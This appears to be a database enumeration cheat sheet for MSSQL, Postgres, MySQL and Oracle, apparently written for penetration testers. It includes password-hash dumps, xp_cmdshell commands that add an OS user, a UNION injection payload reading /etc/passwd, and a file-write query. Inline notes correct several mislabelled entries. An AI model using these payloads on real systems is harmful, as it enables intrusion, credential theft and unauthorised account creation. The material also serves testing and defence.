Databases

(last edited: 07/31/2019) - Microsoft SQL Server - Postgres - MySQL - Oracle

Microsoft SQL

SELECT @@version  -- DB version
EXEC xp_msver  -- Detailed version info
EXEC master..xp_cmdshell 'net user'  -- Run OS command (xp_cmdshell is disabled by default; enabling it through sp_configure is an auditable configuration change)
SELECT HOST_NAME()  -- Hostname & IP
SELECT DB_NAME()  -- Current DB
SELECT name FROM master..syslogins  -- List DBs (as written this lists logins; the database catalog is master..sysdatabases)
SELECT user_name()  -- Current user
SELECT name FROM master..syslogins  -- List users
SELECT name FROM master..sysobjects WHERE xtype='U';  -- List tables
SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='mytable');  -- List columns

SYSTEM TABLE CONTAINING INFO ON ALL TABLES

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

LIST ALL TABLES/COLUMNS

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')

PASSWORD HASHES ( 2005 )

SELECT name, password_hash FROM master.sys.sql_logins  -- password_hash is only returned to principals holding CONTROL SERVER


POSTGRES

SELECT version();  -- DB version
SELECT inet_server_addr();  -- Hostname and IP
SELECT current_database();  -- Current DB
SELECT datname FROM pg_database;  -- List DBs
SELECT user;  -- Current user
SELECT usename FROM pg_user;  -- List users
SELECT usename, passwd FROM pg_shadow;  -- List password hashes (pg_shadow is readable only by superusers)

List Columns

SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE 'public')

List Tables

SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN
pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN
('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND
pg_catalog.pg_table_is_visible(c.oid)


MySQL

SELECT @@version;  -- DB version
SELECT @@hostname;  -- Hostname & IP
SELECT database();  -- Current DB
SELECT DISTINCT(db) FROM mysql.db;  -- List DBs
SELECT user();  -- Current user
SELECT user FROM mysql.user;  -- List users
SELECT host, user, password FROM mysql.user;  -- List password hashes (MySQL 5.7+ stores the hash in authentication_string; the password column no longer exists)

LIST ALL TABLES & COLUMNS

SELECT table_schema, table_name, column_name FROM
information_schema.columns WHERE
table_schema != 'mysql' AND table_schema != 'information_schema'

EXECUTE OS COMMAND THROUGH MYSQL (note: the example below uses the SQL Server osql client and xp_cmdshell, not MySQL)

osql -S [ip],[port] -U sa -P pwd -Q "exec xp_cmdshell 'net user /add user pass'" 

READ WORLD-READABLE FILES

' UNION ALL SELECT LOAD_FILE('/etc/passwd');  -- requires the FILE privilege and is restricted by secure_file_priv

WRITE TO FILE SYSTEM

SELECT * FROM mytable INTO DUMPFILE '/tmp/somefile';  -- requires the FILE privilege; secure_file_priv limits the target directory


Oracle

SELECT * FROM v$version;  -- DB version
SELECT version FROM v$instance;  -- DB version
SELECT instance_name FROM v$instance;  -- Current DB
SELECT name FROM v$database;  -- Current DB
SELECT DISTINCT owner FROM all_tables;  -- List DBs
SELECT user FROM dual;  -- Current user
SELECT username FROM all_users ORDER BY username;  -- List users
SELECT column_name FROM all_tab_columns;  -- List columns
SELECT table_name FROM all_tables;  -- List tables
SELECT name, password, astatus FROM sys.user$;  -- List password hashes (sys.user$ is only readable with privileged access to the SYS schema)

LIST DBAs

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';